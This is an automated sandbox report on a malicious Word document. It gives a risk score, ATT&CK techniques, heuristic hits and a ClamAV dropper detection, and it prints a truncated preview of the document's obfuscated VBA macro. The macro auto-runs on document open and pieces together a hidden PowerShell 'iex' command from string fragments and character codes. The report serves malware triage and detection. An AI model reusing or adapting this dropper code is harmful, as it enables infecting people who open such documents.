MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a Microsoft Office document containing VBA macros. The 'Document_open' macro is present and utilizes the 'Shell()' function, indicating an attempt to execute arbitrary code. This is further supported by the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic firing, which specifically notes execution tokens associated with 'Document_open' and 'Shell()'. The ClamAV detection 'Doc.Dropper.Agent-6607753-0' strongly suggests a dropper functionality, likely downloading a second-stage payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6607753-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6607753-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46791 bytes |
SHA-256: 131152e2c5517d249806864f60f421ee8f3007ab8953b175e7f3a4a46c9b485e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "JUjaivIzL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
vwLNU = 70077 - 90423 - (18604 / aGkiww)
frIXB = 16085 - 43283 - (71344 / rtUJA)
muqpcw = 85638 - 2228 - (79316 / aZIOs)
LDFfAC = Application.Run("UKkOtTjOB", "" + FwRRrGCHt + SQpMUVR + zzGQYb + aQniRzRQ + ziwLpOAoj + coDukLszGTI + hvooJJ + WJLQcLfCi + CPYULqfW + XTGcbMndHrz + DEfdoiGpR + FWvPh + pGFhaVFq + fwzjfPK + MBLHU + JzhJYVJD + spWzUfiK + lzvimSaVZ + okFQHnSSHChzo + idLGcouOBSWui)
wKmcd = 7557 - 77312 - (42655 / CWJppT)
rhZlhv = 11842 - 7669 - (88503 / Dzlto)
End Sub
Attribute VB_Name = "GXNLFou"
Function zzGQYb()
On Error Resume Next
uzvOSv = (APVwo / QIzZrr + 42680 - 52775 + ssClha / 94509 / 33291 - hrizVn / 381 + vNcEkf - 93496 / Wbock - WINFDM + NiDzcP)
RmLZI = IwcIMF * KzIpI * 92764 * VmQkn + iiZGH + AWFod
nULccd = "" + NKlwqHUCfvIUT + fWbmFMZZVAwE + "pO"
wdEhi = 25125 * zkISvP - JwvSp * ivXcSc * wdjwwt / icTAni / 89156 - OWijc / NLhBk * oDGbOG
KinjG = 15734 * ATtjh - Ddwnza * aSCPWd * lPwuCd / UQVnMS / 42473 - ChGXhW / XNwiBi * cXJdTZ
jvuXh = "" + AKWClmhfvi + VhBtjzjlSCwLAp + "we" + slhJPrNMLj + fjmXduTVFh + "rS" + stDwNKCv + nJzzidTo + "hEl" + ILFmQYi + KQKGaRWoPw + "l " + vOTtcafMpBQ + wjoQipbvZwu + " " + XjMpEph + zltnwDtj + Chr(34) + "& " + KfbkiXh + iWRZQZCwzA + "( $p" + SCljCXuqYBt + SXvwiRWjIqqfMc + "sHO" + EufKasdpAfAnTA + cfwBHCViauK + "mE[4" + EqufuTHOiTZtGv + jNHKODjiM + "]" + Chr(43)
Ywjji = (uwoFH - 47719 + YOwLYH + GXRrj + (BhAJP * FRjRu) + (rbLzJM * oblzEV))
mdwzjTXrc = "" + vAfszfQMvfpoT + wDXjjoHNFPsbP + "$p" + nJNRWimCoLKzEi + VMwCAwZZwnnZd + "Sho" + BizrfbB + KBiUVpD + "Me[3" + bXOTfvpkoTjv + hHJUFmqMTV + "4]" + Chr(43) + zPEDIkEqBjqhz + umiIKzc + "'x'" + LVwwsPDtd + ajkKwrVYzRcUBk + ") ([" + lMfuXOqsnm + ljzEMHbNBYKTcE + "Stri" + jBwLwpRjzsYMqs + jXmRTYHu + "Ng"
YNCMST = (tImqv - 3750 + OQGTiP + IBwjE + (lcLtC * OQEdl) + (FBwkkV * VpDDRn))
KUvGqlk = "" + PLEcNBZR + ntnfJmUtdNbYR + "]::J" + jciZtFqIEBtZJN + fmriuhJtQzu + "oIN(" + jqubhdYqrDnw + iQNLfYlvmZuA + " '' " + oJwKIbUKz + kflniElJwfd + ", " + OJvnEUhjbGBi + oJOTRPjvtzI + "(( " + JrDmLGLwwj + iQvIYkE + "36" + wzkLLnBTPwi + YoYTpcvjpdhOmz + " ,97" + UPDbtMsSaASJ + jCEjrGkEucjv + " ," + DzZoNjuhba + vFspJmDG + "117" + JGHhCQUauwG + daiwwoCad + " ,10" + LiMETurzaYo + fdiMAfFFYpPO + "4,6"
zzGQYb = "" + HSrEffbWYDQHA + wrpIzRS + nULccd + awVanowpoEkjj + nFIFbvti + jvuXh + bwaGhYoJBdhJAj + bSwWZNXj + mdwzjTXrc + INiuhUWbLqViH + XipaiEZWTUahdZ + KUvGqlk
tloQab = (wMnZX - 85968 + sLQZCi + GqnirO + (GmtBzQ * zSPWvc) + (NqfBdi * ORDXjs))
BhjNfq = (tXacIv - 87932 + DHCps + HhNjws + (piNYo * Qimiw) + (nwIaB * jUPAQ))
End Function
Function aQniRzRQ()
On Error Resume Next
vtzVhj = (FEsMEU - 87065 + TQYGmE + zGMGS + (FpOhV * GWiRBP) + (isPOz * nrwjr))
qsusI = (OZzPif - 67252 + mGkzXr + WKjsPB + (jIFXHE * OcpIa) + (fidli * iAlLk))
wwiXhNDAo = "" + ThLztYjtqJGX + XivqwqBojz + "1 " + WiuzUDY + jQpPCQlrTiKj + ", 1" + HQuWshfBNpr + wtpDzKo + "10" + FauZQwNSz + BnhajfmDf + ",101" + YAKmzibLYSluKT + RinvqZlEL + ", 11" + WTYlLJFCu + zirntzPtWGF + "9,45"
aQniRzRQ = "" + UrIJwOGblP + zjakERhDnjFDD + wwiXhNDAo
JSoXKh = 71467 * EGSaQJ + GolvPG - 66081
pRpJRG = 7273 * TBwEf + CNTlv - 88512
End Function
Function ziwLpOAoj()
On Error Resume Next
SNzKwB = 65298 * LbWPzP + mzhEP - 2463
ukVmS = 13690 * WBIXUt + Vfhzql - 10055
VpThl = "" + pakZkQbwBqDYUw + ThMsXjYQhL + ",1" + AdsubCV + IquzaOGMb + "11 ," + tjwTLtX + UrZZXvY + "98 ," + zRbPDKrR + SRDGtpKRhYihfM + " 106" + QQVbiqIDdAbdfl + AaqkQljjMdqaaP + ",1" + tGtawRSbI + sOjlvvohEWl + "01 " + klOBzhcNNMk + CziIObQJnVfrv + ", " + hisHaOqLCQcb + iBwNCtrzv + "99,1" + PVwPiJEC + fTdwdLljrmA + "16 " + ITjismvimkzKtu + HYYhjzhTOZ + ", 3" + SDVJXbn + iLQuwtifnkRpMj + "2, 7" + LKJlQQTEpQj + nRGAUdMImmFwn + "8 ,1"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.